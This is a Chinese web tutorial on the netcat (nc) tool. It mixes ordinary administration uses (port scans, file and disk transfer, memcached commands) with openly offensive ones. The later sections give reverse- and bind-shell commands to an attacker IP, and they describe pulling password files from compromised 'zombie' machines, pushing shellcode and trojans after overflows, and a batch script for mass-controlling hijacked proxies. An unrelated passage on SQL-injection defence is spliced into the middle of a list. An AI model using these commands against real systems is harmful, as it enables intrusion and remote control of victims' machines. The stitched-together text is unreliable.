linux nc命令小结

NC 全名 Netcat (网络刀),作者是 Hobbit && ChrisWysopal。因其功能十分强大,体积小巧而出名,又被大家称为“瑞士军刀”。nc - TCP/IP swiss army knife

nc 常用于溢出、反向链接、上传文本等。其实是一个非标准的 telnet 客户端程序。也是一个 putty.exe 客户端程序。

socat 是一个 nc 的替代品,可以称为 nc++。是netcat的N倍加强版。socat 支持的连接方式很多,有 ip、tcp、udp、ipv6、pipe、exec、system、open proxy、openssl 等

功能说明:功能强大的网络工具

语  法:nc [-hlnruz][-g<网关...>][-G<指向器数目>][-i<延迟秒数>][-o<输出文件>][-p<通信端口>]
    [-s<来源位址>][-v...][-w<超时秒数>][主机名称][通信端口...]

参  数:
  -g<网关>         设置路由器跃程通信网关,最多可设置8个。
  -G<指向器数目>   设置来源路由指向器,其数值为4的倍数。
  -h               在线帮助。
  -i<延迟秒数>     设置时间间隔,以便传送信息及扫描通信端口。
  -l               监听模式,用于入站连接 (监听本地端口)。
  -n               直接使用IP地址,而不通过域名服务器。
  -o<输出文件>     指定文件名称,把往来传输的数据以16进制字码倾倒成该文件保存。
  -p<通信端口>     设置本地主机使用的通信端口。
  -r               随机指定本地与远端主机的通信端口。
  -s<来源位址>     设置本地主机送出数据包的IP地址。
  -u               使用UDP传输协议。
  -v               显示指令执行过程。
  -w<超时秒数>     设置等待连线的时间。
  -z               使用0输入/输出模式,只在扫描通信端口时使用。

[root@hatest1 ~]# type -a nc
nc is /usr/bin/nc
[root@hatest1 ~]# rpm -q nc
nc-1.10-22

1)端口扫描

nc -v -z host.example.com 70-80      #扫描端口(70到80),可指定范围。-v输出详细信息。
nc -v -w 1 192.168.228.222 -z 1-1000
root@~# nc -v -w 2 192.168.2.34 -z 21-24  # 也可以不带-z参数试下效果
nc: connect to 192.168.2.34 port 21 (tcp) failed: Connection refused
Connection to 192.168.2.34 22 port [tcp/ssh] succeeded!
nc: connect to 192.168.2.34 port 23 (tcp) failed: Connection refused
nc: connect to 192.168.2.34 port 24 (tcp) failed: Connection refused
root@10.1.1.43:~# nc -v -z -w2 127.0.0.1 1-100
root@10.1.1.43:~# nc -v -w 10 10.1.1.180 80
root@10.1.1.43:~# nc -v -w 10 10.1.1.180 -z 80-30000
# 监听本地端口
root@10.1.1.43:~# nc -l -p 1234
root@10.1.1.43:~# netstat -tunlp | grep 1234
tcp    0   0 0.0.0.0:1234      0.0.0.0:*        LISTEN   15543/nc
# 测试UDP端口
root@172.16.211.34:web# netstat -tunlp
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address        Foreign Address       State    PID/Program name
tcp    0   0 0.0.0.0:22         0.0.0.0:*          LISTEN   1111/sshd
udp    0   0 0.0.0.0:68         0.0.0.0:*                887/dhclient 
root@172.16.211.35:~# nc -vuz 172.16.211.34 68
Connection to 172.16.211.34 68 port [udp/bootpc] succeeded!
nc -p 1234 -w 5 host.example.com 80

建立从本地1234端口到host.example.com的80端口连接,5秒超时

nc -u host.example.com 53

u为UDP连接

2) 远程拷贝文件

从server1拷贝文件到server2上。

先在server2上,用nc激活监听,server2上运行:

[root@hatest2 tmp]# nc -lp 1234 > install.log

server1上运行:

[root@hatest1 ~]# ll install.log
-rw-r--r--  1 root root 39693 12月 20  2007 install.log
[root@hatest1 ~]# nc -w 1 192.168.228.222 1234 < install.log

目的主机监听

nc -l 监听端口 > 要接收的文件名
nc -l 4444 > cache.tar.gz

源主机发起请求

nc 目的主机ip  目的端口
nc 192.168.0.85 4444 

netstat  如下

[root@localhost jiangbao]# netstat -tpln
tcp    0   0 0.0.0.0:4444        0.0.0.0:*          LISTEN   18166/nc 

目录传输

从server1拷贝nginx-0.6.34目录内容到server2上。

先在server2上,用nc激活监听,server2上运行:

[root@hatest2 tmp]# nc -l 1234 |tar xzvf -

server1上运行:
[

root@hatest1 ~]# ll -d nginx-0.6.34
drwxr-xr-x 8 1000 1000 4096 12-23 17:25 nginx-0.6.34
[root@hatest1 ~]# tar czvf - nginx-0.6.34|nc 192.168.228.222 1234

从192.168.2.33拷贝文件到192.168.2.34

在192.168.2.34上: nc -l 1234 > test.txt

在192.168.2.33上: nc 192.168.2.34 < test.txt

克隆硬盘或分区

操作与上面的拷贝是雷同的,只需要由dd获得硬盘或分区的数据,然后传输即可。

克隆硬盘或分区的操作,不应在已经mount的的系统上进行。

所以,需要使用安装光盘引导后,进入拯救模式(或使用Knoppix工具光盘)启动系统后,在server2上进行类似的监听动作:

# nc -l -p 1234 | dd of=/dev/sda

server1上执行传输,即可完成从server1克隆sda硬盘到server2的任务:

# dd if=/dev/sda | nc 192.168.228.222 1234

3) 简单聊天工具

在192.168.2.34上: nc -l 1234

在192.168.2.33上: nc 192.168.2.34 1234

这样,双方就可以相互交流了。使用ctrl+C(或D)退出。

nc -l 1234
nc 127.0.0.1 1234

在端口1234建立连接,互相发送输入

4) 保存Web页面

# while true; do nc -l -p 80 -q 1 < somepage.html; done

5) 模拟HTTP Headers

[root@hatest1 ~]# nc www.linuxfly.org 80 GET / HTTP/1.1 Host: ispconfig.org Referrer: mypage.com User-Agent: my-browser
HTTP/1.1 200 OK Date: Tue, 16 Dec 2008 07:23:24 GMT Server: Apache/2.2.6 (Unix) DAV/2 mod_mono/1.2.1 mod_python/3.2.8 Python/2.4.3 mod_perl/2.0.2 Perl/v5.8.8 Set-Cookie: PHPSESSID=bbadorbvie1gn037iih6lrdg50; path=/ Expires: 0 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Cache-Control: private, post-check=0, pre-check=0, max-age=0 Set-Cookie: oWn_sid=xRutAY; expires=Tue, 23-Dec-2008 07:23:24 GMT; path=/ Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: text/html [......]

在nc命令后,输入红色部分的内容,然后按两次回车,即可从对方获得HTTP Headers内容。

echo -n "GET / HTTP/1.0"r"n"r"n" | nc host.example.com 80

连接到主机并执行

6) 用nc命令操作memcached
1)存储数据:printf “set key 0 10 6rnresultrn” |nc 192.168.2.34 11211
2)获取数据:printf “get keyrn” |nc 192.168.2.34 11211
3)删除数据:printf “delete keyrn” |nc 192.168.2.34 11211
4)查看状态:printf “statsrn” |nc 192.168.2.34 11211
5)模拟top命令查看状态:watch “echo stats” |nc 192.168.2.34 11211
6)清空缓存:printf “flush_allrn” |nc 192.168.2.34 11211 (小心操作,清空了缓存就没了)

 补充教程 2

nc的使用方法

netcat被誉为网络安全界的‘瑞士军刀',相信没有什么人不认识它吧......

一个简单而有用的工具,透过使用TCP或UDP协议的网络连接去读写数据。它被设计成一个稳定的后门工具,能够直接由其它程序和脚本轻松驱动。同时,它也是一个功能强大的网络调试和探测工具,能够建立你需要的几乎所有类型的网络连接,还有几个很有意思的内置功能(详情请看下面的使用方法)。 在中国它的WINDOWS版有两个版本,一个是原创者Chris Wysopal写的原版本,另一个是由‘红与黑'编译后的新‘浓缩'版。‘浓缩'版的主程序只有10多KB(10多KB的NC是不能完成下面所说的第4、第5种使用方法,有此功能的原版NC好象要60KB:P),虽然“体积”小,但很完成很多工作。

软件介绍:
工具名:Netcat
作者:Hobbit && Chris Wysopal
网址:http://www.atstake.com/research/tools/network_utilities/
类别:开放源码
平台:Linux/BSD/Unix/Windows
WINDOWS下版本号:[v1.10 NT]

参数介绍:

nc.exe -h 即可看到各参数的使用方法。
基本格式:nc [-options] hostname port[s] [ports] ...
nc -l -p port [options] [hostname] [port]
-d          后台模式
-e          程序重定向,一旦连接,就执行 [危险!!]
-g gateway  source-routing hop point[s], up to 8    设置路由器跃程通信网关,最多可设置8个。
-G num      source-routing pointer: 4, 8, 12, ...   设置来源路由指向器,其数值为4的倍数。
-h          帮助信息
-i secs     延时的间隔
-l          监听模式,用于入站连接 (监听本地端口)
-L          连接关闭后,仍然继续监听
-n          指定数字的IP地址,不能用hostname。即直接使用IP地址,而不通过域名服务器。
-o file     指定文件名称,把往来传输的数据以16进制字码倾倒成该文件保存。
-p port     本地端口号 (指定本地端口 )
-r          随机本地及远程端口
-s addr     本地源地址
-t          使用TELNET交互方式(用telnet来回应 )
-u          UDP模式
-v          详细输出--用两个-v( -vv)可得到更详细的内容. 获得端口信息
-w secs     timeout的时间
-z          将输入输出关掉--只用于扫描. 端口的表示方法可写为M-N的范围格式。

基本用法:

大概有以下几种用法:

1) 连接到 remote 主机,例子:
    格式:nc -nvv 192.168.x.x 80
    讲解:连到192.168.x.x的TCP80端口
2) 监听 local 主机,例子:
    格式:nc -l -p 80
    讲解:监听本机的TCP80端口
3) 扫描远程主机,例子:
    格式:nc -nvv -w2 -z 192.168.x.x 80-445
    讲解:扫描192.168.x.x的TCP80到TCP445的所有端口
4) remote 主机绑定 shell,例子:
    格式:nc -l -p 5354 -t -e c:winntsystem32cmd.exe
    讲解:绑定REMOTE主机的CMDSHELL在REMOTE主机的TCP5354端口
5) REMOTE主机绑定SHELL并反向连接,例子:
    格式:nc -t -e c:winntsystem32cmd.exe 192.168.x.x 5354
    讲解:绑定REMOTE主机的CMDSHELL并反向连接到192.168.x.x的TCP5354端口
以上为最基本的几种用法(其实NC的用法还有很多,当配合管道命令“|”与重定向命令“<”、“>”等等命令功能更强大......)。
高级用法:
6) 作攻击程序用,例子:
    格式1:type.exe c:exploit.txt|nc -nvv 192.168.x.x 80
    格式2:nc -nvv 192.168.x.x 80 < c:exploit.txt
    讲解:连接到192.168.x.x的80端口,并在其管道中发送c:exploit.txt的内容(两种格式确有相同的效果,真是有异曲同工之妙:P)
    附:c:exploit.txt为shellcode等
7) 作蜜罐用[1],例子:
    格式:nc -L -p 80
    讲解:使用-L(注意L是大写)可以不停地监听某一个端口,直到ctrl+c为止.
8) 作蜜罐用[2],例子:
    格式:nc -L -p 80 > c:log.txt
    讲解:使用-L可以不停地监听某一个端口,直到ctrl+c为止,同时把结果输出到c:log.txt中,如果把‘>'改为‘>>'即可以追加日志。
    附:c:log.txt为日志等
9)作蜜罐用[3],例子:
    格式1:nc -L -p 80 < c:honeypot.txt
    格式2:type.exe c:honeypot.txt|nc -L -p 80
    讲解:使用-L可以不停地监听某一个端口,直到ctrl+c为止,并把c:honeypot.txt的内容‘送'入其管道中。
          如果攻击者知道应用会将表单中输入的内容直接用于验证身份的查询,他就会尝试输入某些特殊的SQL字符串篡改查询改变其原来的功能,
          欺骗系统授予访问权限。系统环境不同,攻击者可能造成的损害也不同,这主要由应用访问数据库的安全权限决定。
          如果用户的帐户具有管理员或其他比较高级的权限,攻击者就可能对数据库的表执行各种他想要做的操作,
          包括添加、删除或更新数据,甚至可能直接删除表。

二、如何防范?

好在要防止ASP.NET应用被SQL注入式攻击闯入并不是一件特别困难的事情,只要在利用表单输入的内容构造SQL命令之前,把所有输入内容过滤一番就可以了。过滤输入内容可以按多种方式进行。

⑴ 对于动态构造SQL查询的场合,可以使用下面的技术:

第一:替换单引号,即把所有单独出现的单引号改成两个单引号,防止攻击者修改SQL命令的含义。再来看前面的例子,“Select * from Users Where login = or 1=1 AND password = or 1=1”显然会得到与“Select * from Users Where login = or 1=1 AND password = or 1=1”不同的结果。

第二:删除用户输入内容中的所有连字符,防止攻击者构造出类如“Select * from Users Where login = mas -- AND password =”之类的查询,因为这类查询的后半部分已经被注释掉,不再有效,攻击者只要知道一个合法的用户登录名称,根本不需要知道用户的密码就可以顺利获得访问权限。

第三:对于用来执行查询的数据库帐户,限制其权限。用不同的用户帐户执行查询、插入、更新、删除操作。由于隔离了不同帐户可执行的操作,因而也就防止了原本用于执行Select命令的地方却被用于执行Insert、Update或Delete命令。

⑵ 用存储过程来执行所有的查询。SQL参数的传递方式将防止攻击者利用单引号和连字符实施攻击。此外,它还使得数据库权限可以限制到只允许特定的存储过程执行,所有的用户输入必须遵从被调用的存储过程的安全上下文,这样就很难再发生注入式攻击了。

⑶ 限制表单或查询字符串输入的长度。如果用户的登录名字最多只有10个字符,那么不要认可表单中输入的10个以上的字符,这将大大增加攻击者在SQL命令中插入有害代码的难度。

⑷ 检查用户输入的合法性,确信输入的内容只包含合法的数据。数据检查应当在客户端和服务器端都执行——之所以要执行服务器端验证,是为了弥补客户端验证机制脆弱的安全性。

在客户端,攻击者完全有可能获得网页的源代码,修改验证合法性的脚本(或者直接删除脚本),然后将非法内容通过修改后的表单提交给服务器。因此,要保证验证操作确实已经执行,唯一的办法就是在服务器端也执行验证。你可以使用许多内建的验证对象,例如RegularExpressionValidator,它们能够自动生成验证用的客户端脚本,当然你也可以插入服务器端的方法调用。如果找不到现成的验证对象,你可以通过CustomValidator自己创建一个。

⑸ 将用户登录名称、密码等数据加密保存。加密用户输入的数据,然后再将它与数据库中保存的数据比较,这相当于对用户输入的数据进行了“消毒”处理,用户输入的数据不再对数据库有任何特殊的意义,从而也就防止了攻击者注入SQL命令。System.Web.Security.formsAuthentication类有一个HashPasswordForStoringInConfigFile,非常适合于对输入数据进行消毒处理。

⑹ 检查提取数据的查询所返回的记录数量。如果程序只要求返回一个记录,但实际返回的记录却超过一行,那就当作出错处理。

nc -l -v -p 7626 

打开本地的7626端口进行监听,并反馈连接信息。

如果有扫描冰河木马的人会认为你中了木马开放了7626,和“小猪快跑”的功能有点象。再加个批处理文件一起用的话就是一个“小猪快跑”了。

nc -l -p 80 >>c:\\日志.dat

如果要监视是否有入侵本地80端口的行为,并记下来用这个命令。这样,凡是有针对本机80端口的攻击都会被记录下来的

nc -l -p 123 -e cmd.exe 或者是: nc -l -p 123 -t 

如果你通过溢出进入了别人的机器,就可以运行上面命令。作用都是以cmd.exe来响应到机器上123端口的连接。

这样就把溢出的主机变成了一台telnet肉鸡了。也可以用命令让肉鸡主动连接你的主机,假设我的IP是192.168.0.1

在肉鸡上运行: nc -e cmd.exe 192.168.0.1 777 。再在本地机器上运行: nc -l -p 777

意思是让肉鸡将cmd.exe(就是个shell)主动响应到你电脑的777端口。你再在本地机上监听777端口,这样就进入了对方的cmd了

这也微十时毫 反弹端口式木马的原理了。

nc -v 192.168.0.25 80 

获取192.168.0.25的80端口的信息。可以获得IIS版本等很多重要信息 的

nc -v -z 192.168.0.25 1-100 

扫描192.168.0.25的1到100间的TCP端口

nc -v -z -u 192.168.0.25 1-100 

这是扫描1到00间的UDP端口

nc -vv ip port  //端口的刺探:
RIVER [192.168.0.198] 19190 (?) open //显示是否开放open

扫描器

nc -vv -w 5 ip port-port port
nc -vv -z ip port-port port

这样扫描会留下大量的痕迹,系统管理员会额外小心。

后门

victim machine:      // 受害者的机器
nc -l -p port -e cmd.exe // win2000
nc -l -p port -e /bin/sh // unix,linux
attacker machine:     // 攻击者的机器.
nc ip -p port       // 连接victim_IP,然后得到一个shell。

反向连接

attacker machine:   //一般是sql2.exe,远程溢出,webdavx3.exe攻击.
//或者wollf的反向连接.
nc -vv -l -p port
victim machine:
nc -e cmd.exe attacker ip -p port
nc -e /bin/sh attacker ip -p port

或者:

attacker machine:
nc -vv -l -p port1
nc -vv -l -p prot2
victim machine:
nc attacker_ip port1 | cmd.exe | nc attacker_ip port2
nc attacker_ip port1 | /bin/sh | nc attacker_ip port2

139要加参数-s(nc.exe -L -p 139 -d -e cmd.exe -s 对方机器IP),这样就可以保证nc.exe优先于NETBIOS。

传送文件:

attacker machine <-- victim machine  //从肉鸡拖密码文件回来.
nc -d -l -p port < path\filedest     可以shell执行
nc -vv attacker_ip port > path\file.txt 需要Ctrl+C退出
//肉鸡需要gui界面的cmd.exe里面执行(终端登陆,不如安装FTP方便).否则没有办法输入Crl+C.
attacker machine --> victim machine //上传命令文件到肉鸡
nc -vv -l -p port > path\file.txt      需要Ctrl+C退出
nc -d victim_ip port < path\filedest   可以shell执行
//这样比较好.我们登陆终端.入侵其他的肉鸡.可以选择shell模式登陆.

端口数据抓包.

nc -vv -w 2 -o test.txt xfocus.Net 80 21-15
< 00000058 35 30 30 20 53 79 6e 74 61 78 20 65 72 72 6f 72 # 500 Syntax error
< 00000068 2c 20 63 6f 6d 6d 61 6e 64 20 22 22 20 75 6e 72 # , command "" unr
< 00000078 65 63 6f 67 6e 69 7a 65 64 2e 0d 0a # ecognized...
< 00000084 83 00 00 01 8f # .....

telnet,自动批处理。

nc victim_ip port < path\file.cmd   显示执行过程.
nc -vv victim_ip port < path\file.cmd   显示执行过程.
nc -d victim_ip port < path\file.cmd 安静模式.
_______________file.cmd________________________
password
cd %windir%
echo []=[%windir%]
c:
cd \
md test
cd /d %windir%\system32\
net stop sksockserver
snake.exe -config port 11111
net start sksockserver
exit
_______________file.cmd__END___________________

########################################
     管理肉鸡,更改肉鸡设置
########################################

1) 比如要统一更改肉鸡上面的代理端口.snake.exe 修改为11111 服务名称"sksockserver",使用winshell后门. 端口1234 密码password

命令格式就是:

modi.bat youip.txt
___________modi.bat____________________________
@if "%1"=="" echo Error: no ip.txt &&goto END
:start
@echo password >a.cmd
@echo s >>a.cmd
@echo cd /d %%windir%%\system32\ >>a.cmd
@net stop "sksockserver" >>a.cmd
@snake.exe -config port 11111 >>a.cmd
@net start "sksockserver" >>a.cmd
@exit >>a.cmd
:auto
@for /f "eol=; tokens=1,2" %%i in (%1) do @(nc.exe -vv -w 3 %%i 1234 < a.cmd)
:END
___________modi.bat__END_______________________

2)

@echo off
color f0
:start
cls
C:\nc -vv -w 3 -l -p 80>>80.txt
goto start

把防火墙关掉以后运行这个批处理,会监听到许多探测U漏洞的信息,大多是三条一组--妮姆达病毒扫描你的。
这样就会得到肉鸡的.虽然质量不高.但是也是一种便宜的办法.

肉鸡特征:
1。unicode漏洞
2。guest密码为空,administrators组用户
3。其他漏洞
用于传输文件 — ncp

#! /bin/sh
## 类似于rcp,但是是用netcat在高端口做的
## 在接收文件的机器上做"ncp targetfile"
## 在发送文件的机器上做"ncp sourcefile receivinghost"
## 如果调用了 "nzp" ,会将传输文件压缩
## 这里定义你想使用的端口,可以自由选择
MYPORT=23456
## 如果nc没有在系统路径中的话,要把下面一行注释去掉,加以修改
# PATH=$:$ ; export PATH
## 下面这几行检查参数输入情况:
test "$3" && echo "too many args" && exit 1
test ! "$1" && echo "no args?" && exit 1
me=`echo $0 | sed s+.*/++`
test "$me" = "nzp" && echo [compressed mode]
# if second arg, its a host to send an [extant] file to.
if test "$2" ; then
test ! -f "$1" && echo "cant find $1" && exit 1
if test "$me" = "nzp" ; then
  compress -c < "$1" | nc -v -w 2 $2 $MYPORT && exit 0
else
  nc -v -w 2 $2 $MYPORT < "$1" && exit 0
fi
echo "transfer FAILED!"
exit 1
fi
# 是否在接收文件机器当前目录有同名文件
if test -f "$1" ; then
echo -n "Overwrite $1? "
read aa
test ! "$aa" = "y" && echo "[punted!]" && exit 1
fi
# 30 seconds oughta be pleeeeenty of time, but change if you want.
if test "$me" = "nzp" ; then
# 注意这里nc的用法,结合了重定向符号和管道
nc -v -w 30 -p $MYPORT -l < /dev/null | uncompress -c > "$1" && exit 0
else
nc -v -w 30 -p $MYPORT -l < /dev/null > "$1" && exit 0
fi
echo "transfer FAILED!"
# clean up, since even if the transfer failed, $1 is already trashed
rm -f "$1"
exit 1

这样的话,我只要在A机器上先 QuackA# ncp ../abcd

listening on 然后在另一台机器B上

QuackB#ncp abcd 192.168.0.2
quackb [192.168.0.1] 23456 (?) 

A机上出现

open connect to [192.168.0.2] from quackb [192.168.0.1] 1027
# 查看一下,文件传输完毕。

===========================================================================
【本地运行】nc -v ip port
【命令解释】扫瞄某 IP 的某个端口,返回信息详细输出。
===========================================================================
【本地运行】nc -v -z ip port-port
【命令解释】扫描某IP的端口到某端口,返回信息详细输出,但扫描速度较慢。
===========================================================================
【本地运行】nc -v -z -u ip  port-port
【命令解释】扫描某 IP 的某 UDP 端口到某 UDP 端口,返回信息详细输出,但扫描速度较慢。
===========================================================================
【本地运行】nc -l -p 80
【命令解释】开启本机的 TCP 80 端口并监听。
===========================================================================
【本地运行】nc -l -v -p 80
【命令解释】开启本机的 TCP 80 端口并将监听到的信息输出到当前 CMD 窗口。
===========================================================================
【本地运行】nc -l -p 80 > E:/log.dat
【命令解释】开启本机的 TCP 80 端口并将监听到的信息输出到 E:/log.dat 下的日志文件里。
===========================================================================
【本地运行】nc -nvv 192.168.1.101 80
【命令解释】连接到192.168.1.101主机的 80 端口。
===========================================================================
【本地运行】nc -nvv -w2 -z 192.168.1.101 80-1024
【命令解释】扫锚192.168.1.101的80-1024端口,连接超时时间为2秒。
===========================================================================
【远程运行】nc -l -p 2012 -t -e cmd.exe
【本地运行】nc -nvv 192.168.1.101 2012
【命令解释】采用正向连接方式,远程主机(注:假设IP地址为 192.168.1.101)上运行 nc -l -p 2012 -t -e cmd.exe 意为绑定远程主机的 CMD 到
【命令解释】2012 端口,当本地主机连接远程主机成功时就会返回给本地主机一个CMD Shell ;在本地主机上运行 nc -nvv 192.168.1.101 2012 用于
【命令解释】连接已经将 CMD 重定向到 2012 端口的远程主机(注:假设IP地址为 192.168.1.101)。
===========================================================================
【本地运行】nc -l -p 2012
【远程运行】nc -t -e cmd.exe 192.168.1.102 2012
【命令解释】采用反向连接方式,先在本地主机运行 nc -l -p 2012 开启本地主机的(注:假设IP地址为 192.168.1.102)2012 端口并监听等待远程主
【命令解释】机连接;在远程主机上运行 nc -t -e cmd.exe 192.168.1.102 2012 将远程主机的 CMD 重定向到 IP 地址为 192.168.1.102 端口号为
【命令解释】2012 的主机上,连接成功后 IP 地址为 192.168.1.102 的主机会得到一个CMD Shell。
===========================================================================
【本地运行】nc -v -n ip port < C:/sunzn.exe
【远程运行】nc -v -l -p port > D:/sunzn.exe
【命令解释】在本地运行 nc -v -n ip port < C:/sunzn.exe 意为从本地 C 盘根目录中读取 sunzn.exe 文件的内容,并把这些数据发送到远程主机的
【命令解释】对应端口上(注:命令行中的 IP 为接收文件的远程主机 IP ),在远程主机运行 nc -v -l -p port > D:/sunzn.exe 意为监听对应端口并
【命令解释】把接收到的信息数据写到 D:/sunzn.exe 中,两行命令实现了文件在本地主机和远程主机间的传输。
===========================================================================
【本地运行】nc -L -p 8989<C:\ftp.txt ( ftp.txt 中为FTP自动下载命令)
【命令解释】不停地监听 8989 端口,并把 C:\ftp.txt  中的内容发给任何一台连接本机 8989 端口的主机,可起到传送文件作用(此用法经常用于反向
【命令解释】溢出)。溢出远程主机时,一旦溢出的远程主机连接本地主机 8989 端口,远程主机就会自动用 FTP 下载指定的文件,如木马。
===========================================================================

简单使用教程:

命令1:监听命令

  nc -l -p port
  nc -l -p port > e:\log.dat
  nc -l -v -p port

参数解释:
        -l:监听端口,监听入站信息
        -p:后跟本地端口号
        -v:显示端口的信息,如果使用-vv的话,则会显示端口更详细的信息

提示:一般大家都爱用-vv

nc -l -p 80    //这个很简单,监听80端口。如果机器上运行这个命令,端口80被认为是开放的,可以欺骗扫描器
    nc -l -p 80 > e:\log.dat    //将详细信息写入E盘log.dat的日志文件
    nc -l -v -p 80    //和上边命令相似,会直接显示信息在运行着NC的屏幕上。

实践:

例如:nc -l -v -p 80

然后在浏览器中输入本机IP:127.0.0.1

命令2:程序定向(反弹shell的方法)

nc -l -p port -t -e cmd.exe

本地机: nc -l -p port 或 nc -l -v -p port
目标机:nc -e cmd.exe ip port

参数解释:
        -l、-p两个参数已经解释过了
        -e;作用就是程序定向
        -t:以telnet的形式来应答

例子

nc -l -p 5277 -t -e cmd.exe
 //千万不要运行在自己的机器上,如果运行了,你机器就会变成一台TELNET的服务器了。

命令解释:

监听本地端口5277的入站信息,同时将CMD.exe这个程序,重定向到端口5277上,当有人连接的时候,就让程序CMD.exe以TELNET的形式来响应连接要求。说白了,其实就是让他成为一台TELNET的肉鸡,所以这个命令要运行在你的肉鸡上。

例如用法:

local machine:nc -l -p port ( or nc -l -v -p port )
remote machine:nc -e cmd.exe ip port

大家知道灰鸽子和神偷吧,这两款工具都是利用了反弹端口型的木马,

什么叫反弹端口?

就是说,当对方中马后,不用你主动和对方连接,也就是说不用从你的client端向对方主机上运行的server端发送请求连接,而是对方主动来连接你这样就可以使很多防火墙失效,因为很多防火墙都不检查出站请求的。

这里这两个命令结合在一起后,于那两款木马可以说有异曲同工之效。

本地运行:nc -l -p 5277 (监听本地5277端口)或者 nc -l -v -p 5277

然后在远程机器上,想办法运行 nc -e cmd.exe ip 5277

(你可别真的打“ip”在肉鸡上啊)要打,xxx.xxx.xxx.xxx这样!!

这样就是反弹~~在本地机器上得到了一个SHELL

命令3:扫描端口

nc -v ip port
nc -v -z ip port-port
nc -v -z -u ip port-port

参数解释:

-z:将输入输出关掉,在扫描时使用

nc -v ip port  

//这个命令是针对某一个端口进行扫描

例如:

nc -v ip 135
//扫描远程主机的135端口,这样获得了该端口的一些简单信息,但是针对某些端口,我们还可以获得更多的信息

例如:80端口

nc -v ip 80 然后使用get方法来获得对方的WEB服务器的信息

nc -v -z ip port-port
 //这个命令是用来扫描的一个命令,这个命令用于快速扫描TCP端口,而port-port则是指定了扫描的端口范围

例如:

nc -v -z ip 1-200
//可以看到我机器上的1-200的TCP端口的开放情况
nc -v -z -u ip port-port
//这个命令比上个命令多了个-u,这个命令的作用仍然是扫描端口,只是多一个-u的参数,是用来扫UDP端口的

例如:

nc -v -z -u ip 1-200  //这个命令就会扫1-200的UDP端口

命令4:传送文件(HOHO,I LIKE)

LOCAL MACHINE:nc -v -n ip port < x:\svr.exe
REMOTE MACHINE:nc -v -l -p port > y:\svr.exe

参数解释:

-n:指定数字的IP地址

这两个命令结合起来是用来传送文件的

首先,在远程机上运行命令:

nc -v -l -p 5277 > c:\pulist.exe

这个命令还记的吗?呵呵,是不是和监听命令有点类似,对,没错,这个是监听5277端口

并把接受到的信息数据写到c:\pulist.exe中

这时候在本地机上运行

nc -v -n ip 5277 < e:\hack\pulist.exe

这个命令的意思就是,从本地E盘跟目录中读取pulist.exe文件的内容,并把这些数据发送到ip的5277端口上

这样远程主机就会自动创建一个pulist.exe文件。

以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持我们。

(0)

相关推荐

  • Linux 命令之rsync命令详解

    rsync命令 rsync命令是一个远程数据同步工具,可通过LAN/WAN快速同步多台主机间的文件.rsync使用所谓的"rsync算法"来使本地和远程两个主机之间的文件达到同步,这个算法只传送两个文件的不同部分,而不是每次都整份传送,因此速度相当快. rsync是一个功能非常强大的工具,其命令也有很多功能特色选项,我们下面就对它的选项一一进行分析说明. 语法 rsync [OPTION]... SRC DEST rsync [OPTION]... SRC [USER@]host:DE

  • Linux 中的nc命令小结

    NetCat,在网络工具中有"瑞士军刀"美誉,其有Windows和Linux的版本.因为它短小精悍(1.84版本也不过25k,旧版本或缩减版甚至更小).功能实用,被设计为一个简单.可靠的网络工具,可通过TCP或UDP协议传输读写数据.同时,它还是一个网络应用Debug分析器,因为它可以根据需要创建各种不同类型的网络连接. 一.版本 通常的Linux发行版中都带有NetCat(简称nc),甚至在拯救模式光盘中也由busybox提供了简版的nc工具.但不同的版本,其参数的使用略有差异. N

  • Linux利用nc命令监控服务器端口的方法

    最近碰到一个项目,前端用apache htttpd进行发布(80端口),通过双机负载均衡转发到后端的两个tomcat进行处理(8081和8082端口),现在需要随时监控这三个端口的情况,一旦down掉需要能够立即告警处理.批量的系统监控比较好的是用nagios软件来实现,这样小项目专门装一个nagios软件,有点繁琐了.在网上查了一些资料,总结实验了一下,可以用简单的nc命令来实现. 一.nc命令检测端口的用法# nc  -v  -w 10 %IP%   -z  %PORT%-v  显示指令执行

  • linux nc命令小结

    NC 全名 Netcat (网络刀),作者是 Hobbit && ChrisWysopal.因其功能十分强大,体积小巧而出名,又被大家称为"瑞士军刀".nc - TCP/IP swiss army knife nc 常用于溢出.反向链接.上传文本等.其实是一个非标准的 telnet 客户端程序.也是一个 putty.exe 客户端程序. socat 是一个 nc 的替代品,可以称为 nc++.是netcat的N倍加强版.socat 支持的连接方式很多,有 ip.tcp.

  • linux patch 命令小结(收藏)

    说到patch命令,就不得不提到diff命令,也就是制作patch的必要工具.diff命令,在制作patch文件的时候,基本上只需要使用到diff -Nau 这个参数,如果比较的是文件夹,还要加上-r参数,所以一般直接使用Naur参数. 实验的基本步骤.我打算是建立一个级联目录./x/xx/xxx/,在xxx目录下建立两个不同的文件xxx1,xxx2.然后在xxx目录下用diff命令,建立一个补丁文件xxx.patch,在xx目录下建立一个补丁文件xx.patch,在x目录下建立一个补丁文件x.

  • linux常用命令小结之yum、源码安装

    一.软件安装 rpm rpm -ivh zziplib-0.13.62-5.el7.x86_64.rpm   //安装zziplib-0.13.62-5.el7.x86_64.rpm rpm  -qf `which cd`      //查看cd的包名,这里使用反引号,rpm会取反引号中命令的结果作为参数, rpm包格式,包名.版本号.发布版本号.平台 rpm -ivh rpm包文件 //安装 rpm -Uvh rpm包文件 //升级 rpm -e 包名 //卸载 rpm -qa //查询安装的

  • 我常用的一些linux命令小结

    之前做过两年的运维,用过很多命令,深切体会到某些linux命令熟练掌握后对效率提升有多大.举个简单的例子,在做了研发后经常会有跑一些数据,对于结果数据的处理,我们的产品同学一般都习惯于用excel做统计,把数据复制到excel里,然后数据分列,排序---- 最后得出某些简单的结论,我只需要cat, sort, uniq, awk, grep 这几个命令挥手间完成相同的操作. 这里我总结下我工作这几年用过的一些命令,当然,这里就不提那些vim cd ls mv cp 这种简单的命令了,如果你都不会

  • linux压缩常用命令小结

     tar -c: 建立压缩档案 -x:解压 -t:查看内容 -r:向压缩归档文件末尾追加文件 -u:更新原压缩包中的文件 这五个是独立的命令,压缩解压都要用到其中一个,可以和别的命令连用但只能用其中一个.下面的参数是根据需要在压缩或解压档案时可选的. -z:有gzip属性的 -j:有bz2属性的 -Z:有compress属性的 -v:显示所有过程 -O:将文件解开到标准输出 下面的参数-f是必须的 -f: 使用档案名字,切记,这个参数是最后一个参数,后面只能接档案名. # tar -cf all

  • Linux操作系统操作MySQL常用命令小结

